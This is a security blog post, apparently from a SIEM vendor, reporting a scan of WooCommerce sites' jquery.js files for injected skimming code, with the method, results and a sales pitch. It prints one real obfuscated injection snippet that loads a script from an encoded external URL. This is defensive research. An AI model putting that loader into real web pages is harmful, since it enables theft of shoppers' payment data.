We have always focused on backend security on this blog. However, attackers sometimes try to steal sensitive information, including credit card numbers. That’s why we piloted LogSentinel SIEM’s Script Monitoring feature which aims to protect websites from front-end attacks, including formjacking/magecart/form scraping as well as redirecting users to malicious sites. The British Airways breach is a famous example of such an attack performed by injecting code in static javascript files. That’s why we piloted our script verification feature where you can monitor in real-time all the code changes.
We decided to use our script verification utilities to investigate how many sites using WooCommerce may be compromised. For that purpose, we obtained a list of a few hundred thousand WooCommerce URLs and scanned the most likely target of attacks – jquery.js, the script that every WordPress installation has, and that is included on every page, including the credit card information page.
The results are optimistic. Out of 236,146 scanned websites, only 44 appear to be compromised. Usually, the injected script is obfuscated and includes scripts from external sources (after multiple redirects). We did not assess each individual malicious script, but they can in theory collect any data entered on the page and/or redirect to a malicious website. We have contacted the owners of those sites with instructions to have them fixed.
The scanning approach relies on having the canonical jQuery (either original or WordPress-bundled) as a baseline and comparing the jquery.js file against it (minified or not). In case of any discrepancy (after some basic normalization), a mismatch is reported which is then individually investigated. In some cases website, admins have opted for the questionable practice to manually edit their jquery.js file, so the method yields some false positives, but they were removed as part of the analysis.
Here is a typical malicious script appended (or prepended) to jquery.js:
var gdjfgjfgj235f = 1; var d=document;var s=d.createElement(‘script’); s.type=’text/javascript’; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName(‘head’)[0].appendChild(s);
}
The URL from which the malicious script is fetched is encoded, so we have to decode it and follow it. Using curl one can follow the chain of redirects that usually follows to end up seeing the actual script, which either collects data from forms on the screen or opens a malicious website. jquery.js is only one potential script – we are currently inspecting all credit-card related WooCommerce scripts as well.
The numbers are good for now, but malicious actors are actively seeking ways to compromise eCommerce websites and with the rise of eCommerce due to the pandemic, all off-the-shelf platforms (WooCommerce, Magento, Shopify, OpenCart) are to be closely monitored for changes.
If you would like to reduce data breach risks through your frontend, and significantly improve your compliance with security and privacy regulations (e.g. GDPR, HIPAA, PCI DSS, etc.), talk to us today and let us show you how LogSentinel SIEM can help you increase information security:
Bozhidar Bozhanov is a senior software engineer and solution architect with 15 years of experience in the software industry. Bozhidar has been a speaker at numerous conferences and is among the popular bloggers and influencers in the technical field. He’s also a former government advisor on e-government, transparency, and information security.